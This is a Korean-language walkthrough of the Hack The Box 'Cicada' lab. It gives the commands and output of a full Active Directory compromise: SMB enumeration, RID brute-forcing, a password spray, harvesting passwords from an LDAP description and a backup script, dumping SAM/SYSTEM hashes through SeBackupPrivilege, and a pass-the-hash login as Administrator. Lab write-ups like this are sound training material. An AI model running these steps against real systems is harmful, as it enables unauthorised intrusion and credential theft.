1. 정찰
1.1. nmap
nmap 으로 정찰한 결과 특이사항은 없고 DC 서버임을 확인하 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 10.129.231.149
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-26 08:33 +04
Nmap scan report for 10.129.231.149
Host is up (0.26s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-26 11:34:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-12-26T11:35:57+00:00; +6h59m58s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-26T11:35:58+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-12-26T11:35:57+00:00; +6h59m58s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-26T11:35:58+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-26T11:35:21
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m58s, deviation: 1s, median: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.97 seconds
1.2. smb 정찰
1.2.1. smbmap
실패
┌──(root㉿kali)-[/home/kali]
└─# smbmap -H 10.129.231.149
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.231.149, no fun for you...
[*] Closed 1 connections
1.2.2. smbclient
smbclient 를 이용해서 공유 폴더를 식별한다.
┌──(root㉿kali)-[/home/kali]
└─# smbclient -N -L //10.129.231.149
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.231.149 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
1.3. HR 폴더 탐색
HR 폴더를 살펴본다. 해당폴더 내에 notice 가 눈에 띈다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# smbclient -N //10.129.231.149/HR
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 16:29:09 2024
.. D 0 Thu Mar 14 16:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 21:31:48 2024
4168447 blocks of size 4096. 459275 blocks available
smb: \>
해당 파일을 다운받아 확인해 보면 default password는 Cicada$M6Corpb*@Lp#nZp!8 임을 알 수 있다. 물론 계정에 대해서는 확인할 수 없다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
1.4. guest 계정을 이용한 계정 정보 수집
Windows 에서는 기본적으로 존재하는 Guest 계정을 통해 계정 정보를 수집한다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# nxc smb 10.129.231.149 -u guest -p '' --rid-brute
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.231.149 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
수집한 계정 정보를 정갈한 데이터로 다듬어서 users 파일에 저장한다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# netexec smb 10.129.231.149 -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | tee users
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
1.5. michael.wrightson 계정 크리덴셜 습득
users 파일을 통해 nxc 로 패스워드 스프레이 공격을 진행한 결과 michael.wrightson 계정이 접근 가능함을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# nxc smb 10.129.231.149 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
공유폴더를 확인해본 결과 특별히 건질 거는 없었다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# nxc smb 10.129.231.149 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share
1.6. david.orelious 크리덴셜 습득
크리덴셜을 통해서 다시 내부망의 유저들을 검색해본 결과 david.orelious 의 계정 정보를 획득할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# nxc ldap 10.129.231.149 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
LDAP 10.129.231.149 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP 10.129.231.149 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.129.231.149 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb
LDAP 10.129.231.149 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.231.149 389 CICADA-DC Administrator 2024-08-27 00:08:03 1 Built-in account for administering the computer/domain
LDAP 10.129.231.149 389 CICADA-DC Guest 2024-08-28 21:26:56 0 Built-in account for guest access to the computer/domain
LDAP 10.129.231.149 389 CICADA-DC krbtgt 2024-03-14 15:14:10 1 Key Distribution Center Service Account
LDAP 10.129.231.149 389 CICADA-DC john.smoulder 2024-03-14 16:17:29 1
LDAP 10.129.231.149 389 CICADA-DC sarah.dantelia 2024-03-14 16:17:29 1
LDAP 10.129.231.149 389 CICADA-DC michael.wrightson 2024-03-14 16:17:29 0
LDAP 10.129.231.149 389 CICADA-DC david.orelious 2024-03-14 16:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP 10.129.231.149 389 CICADA-DC emily.oscars 2024-08-23 01:20:17 1
해당 계정을 통해 smb 의 공유 폴더를 식별했더니 DEV 폴더에 대해서 접근할 수 있음을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# nxc smb 10.129.231.149 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV READ
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share
smbclient 를 이용해서 접근한 결과 Backup_script.ps1 에 대해서 확인할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# smbclient //10.129.231.149/DEV -U david.orelious%'aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 16:31:39 2024
.. D 0 Thu Mar 14 16:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 21:28:22 2024
4168447 blocks of size 4096. 478467 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \>
해당 스크립트에는 emily.oscars 의 크리덴셜 로그가 확인된다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
1.7. emily.oscars 크리덴셜 습득
습득한 크리덴셜을 통해서 emily.oscars 의 공유폴더를 확인한다. 특별히 눈에 띄는 것은 없었다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# nxc smb 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ READ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ READ,WRITE Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share
그리하여 내부망 침투 가능성을 확인하였고, winrm 을 통해 내부망 침투가 가능한 계정임을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# nxc winrm 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
2. 내부망 침투
2.1. user.txt 파일 획득
evil-winrm 을 통해서 emily.oscars 계정으로 로그인을 하면 내부망에 침투할 수 있고, 바로 user.txt 파일을 습득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ..\Desktop\user.txt
2.2. 권한 확인
whoami /priv 를 통해서 해당 계정에 대해 권한을 확인한다. SeBackupPrivilege 를 통해 모든 파일에 대해 백업 권한이 있음을 확인한다.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
그 외에도 그룹 권한과, net user 으로 권한을 확인한다.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> net user emily.oscars
User name emily.oscars
Full Name Emily Oscars
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/22/2024 1:20:17 PM
Password expires Never
Password changeable 8/23/2024 1:20:17 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 12/26/2025 4:29:25 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
3. 권한 상승
3.1. SAM/SYSTEM 파일 다운로드
SeBackupPrivilege 권한이 존재하므로 SAM 파일과 SYSTEM 파일을 저장하고 다운로드까지 한다.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
3.2. secretsdump 를 이용한 NTLM 해쉬 추출
다운받은 sam 파일과 system 파일을 통해 NTLM 해쉬를 추출한다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
3.3. evil-winrm 을 통핸 PtH 로그인
administrator 의 LM 해쉬를 이용해 evil-winrm 을 통해서 PtH 로 로그인을 시도했고 정상 접속되는 것을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# evil-winrm -i 10.129.231.149 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt